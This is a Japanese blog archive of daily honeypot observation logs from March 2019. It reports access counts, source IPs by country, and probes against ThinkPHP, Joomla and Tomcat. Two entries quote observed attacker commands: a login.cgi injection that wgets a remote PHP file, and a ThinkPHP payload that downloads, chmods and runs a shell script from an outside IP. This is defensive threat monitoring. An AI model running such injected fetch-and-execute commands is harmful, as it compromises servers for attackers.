2019-03-01から1ヶ月間の記事一覧
ハニーポット(仮) 観測記録 2019/03/28分です。thinkphpの脆弱性狙いのアクセス joomlaのバックドア狙いのアクセス を観測しました。 総アクセス数:1455 (前日比:-642)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件…
ハニーポット(仮) 観測記録 2019/03/27分です。 HelloThinkPHPという thinkphpの脆弱性狙いのアクセスを観測しました。/yyyy/wp-login.php のパスでのスキャン活動を確認しました。また昨日と同様に 送信元を変更しながらアクセスしてきているような動きがあ…
ハニーポット(仮) 観測記録 2019/03/26分です。サイトのログインページに対して 送信元を変更しながらアクセスしてきているような動きがありました。 その際のUser-Agentは Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 …
ハニーポット(仮) 観測記録 2019/03/25分です。63435番ポートでアクセスをさせようとしているような動きが観測されました。 中国のIPアドレス宛のようです。 上記にアクセスしてみましたが、「ページが見つかりません」となりました。総アクセス数:831 (前…
ハニーポット(仮) 観測記録 2019/03/24分です。アクセス数は非常に少ないですが Scanではなく、何かしようとしている動きが多く観測されています。http://fid[.]hognoob[.]se/のダウンロードエグゼにアクセスしようとしています。 .seはスウェーデンの国別コ…
ハニーポット(仮) 観測記録 2019/03/23分です。login.cgiに対して cli=aa aa'; wget http://128[.]199.251.119/t.php'$ という動きをしているアクセスがありました。上記のIPについては 「最近台灣熱門搜尋」というページにアクセスできます。 /t.phpはNot F…
ハニーポット(仮) 観測記録 2019/03/22分です。2019/03/20に確認したシグネチャとは違うものを観測しました。 w00tw00t.at.ISC.SANS.DFind:)Apache Tomcatの脆弱性(CVE-2017-12615)を狙ったアクセス thinkphpの脆弱性を狙ったアクセスを観測しています。総…
ハニーポット(仮) 観測記録 2019/03/21分です。アクセス数は戻ったようです。 /robots.txtにだけアクセスして去っていくような動きがありました。mybestloves.phpというファイルへのアクセスを確認しました。 抑えきれない思いでもあるのでしょうか。電話や…
ハニーポット(仮) 観測記録 2019/03/20分です。アクセス数は少なかったですが phpMyAdminに対するスキャンの他に Apache Tomcatの脆弱性(CVE-2017-12615)を狙ったアクセスを確認しました。 PUTしてGETしているようです。なお w00tw00t.at.blackhats.romani…
ハニーポット(仮) 観測記録 2019/03/19分です。Colombiaに引き続き Vietnamからのアクセスを確認しました。thinkphpの脆弱性を狙った exeの設置、設置したexeへのアクセスの流れを確認しました。総アクセス数:2105 (前日比:+1632)都合により GET / HTTP/1.…
ハニーポット(仮) 観測記録 2019/03/18分です。UserAgentでwww.probethenet.com scannerを観測しました。 http://www.probethenet.com/ 定期的にIPv4アドレス空間をスキャンしており、通常月に1回の頻度で実施 Wizardの調査部門が実施しているプロジェクトの…
ハニーポット(仮) 観測記録 2019/03/17分です。/.env, /.git狙いのスキャンを確認しました。 Mexicoからのアクセスを確認しました。総アクセス数:1659 (前日比:+287)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数…
ハニーポット(仮) 観測記録 2019/03/16分です。think php狙いのアクセス TPlink狙いのアクセス がちらほらときていました。 /libraries/joomla/jmail.phpへのアクセスについても 継続で確認できました。総アクセス数:1372 (前日比:+612)都合により GET / H…
ハニーポット(仮) 観測記録 2019/03/15分です。think php狙いのアクセスがちらほらときていました。総アクセス数:760 (前日比:-1356)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 334 112.1…
ハニーポット(仮) 観測記録 2019/03/14分です。libraries/joomla/jmail.php狙いが続いています。 St Kitts and Nevisは セントクリストファー・ネイビス連邦。 大西洋とカリブ海の間に浮かぶ 2 つの島からなる国とのこと。総アクセス数:2116 (前日比:-1199…
ハニーポット(仮) 観測記録 2019/03/13分です。アクセス数が倍増しました。 Yakuza/2.0からのアクセスがありました。 libraries/joomla/jmail.php狙いが増えてきたようです。総アクセス数:3315 (前日比:+2083)都合により GET / HTTP/1.1 POST / HTTP/1.1 …
ハニーポット(仮) 観測記録 2019/03/12分です。総アクセス数:1232 (前日比:-106)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 399 111.113.3.138 China 398 111.19.141.66 China 2 112.79.9…
ハニーポット(仮) 観測記録 2019/03/11分です。総アクセス数:1338 (前日比:+800)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 108 112.218.222.106 South Korea 1 115.29.223.75 China 399 …
ハニーポット(仮) 観測記録 2019/03/10分です。総アクセス数:538 (前日比:-1068)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 394 121.188.88.70 South Korea 2 151.63.162.94 Italy 5 185.…
ハニーポット(仮) 観測記録 2019/03/09分です。think phpに対して以下のコマンド実行を狙っているようです。 wget http[:]//86.105.49.215/a.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; 総アクセス数:1606 (前日比:+1231)都合により GET / HTTP/1.1 POST /…
ハニーポット(仮) 観測記録 2019/03/08分です。総アクセス数:375 (前日比:-1289)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 372 118.24.126.193 China 1 182.254.241.79 China 1 3.84.0.1…
ハニーポット(仮) 観測記録 2019/03/07分です。総アクセス数:1664 (前日比:+651)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 68 ::1 - 366 106.12.215.116 China 2 118.140.55.22 Hong Kon…
ハニーポット(仮) 観測記録 2019/03/06分です。総アクセス数:1013 (前日比:+272)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 366 106.13.53.58 China 1 106.91.209.203 China 3 118.179.21…
ハニーポット(仮) 観測記録 2019/03/05分です。総アクセス数:741 (前日比:-8)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 366 103.10.228.131 Thailand 1 109.143.5.119 Belgium 365 164.1…
ハニーポット(仮) 観測記録 2019/03/04分です。総アクセス数:749 (前日比:+368)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 366 140.143.122.201 China 24 39.104.156.119 China 359 59.37…
ハニーポット(仮) 観測記録 2019/03/03分です。総アクセス数:381 (前日比:-9)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 360 123.207.39.116 China 4 18.179.236.179 Japan 9 212.156.215…
ハニーポット(仮) 観測記録 2019/03/02分です。総アクセス数:390 (前日比:-1077)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 1 115.29.223.75 China 366 118.97.25.93 Indonesia 10 129.15…
ハニーポット(仮) 観測記録 2019/03/01分です。総アクセス数:1467 (前日比:+830)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 334 111.230.197.230 China 368 118.89.38.35 China 2 141.98.…
ハニーポット(仮) 観測記録 2019/02/28分です。総アクセス数:637 (前日比:-57)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 360 124.173.67.77 China 4 163.172.22.247 France 9 202.161.11…
ハニーポット(仮) 観測記録 2019/02/27分です。総アクセス数:694 (前日比:-1261)都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。送信元IPアドレス一覧 件数 送信元IPアドレス 国 360 117.78.40.235 China 5 217.229.153.37 Germany 1 221.12.…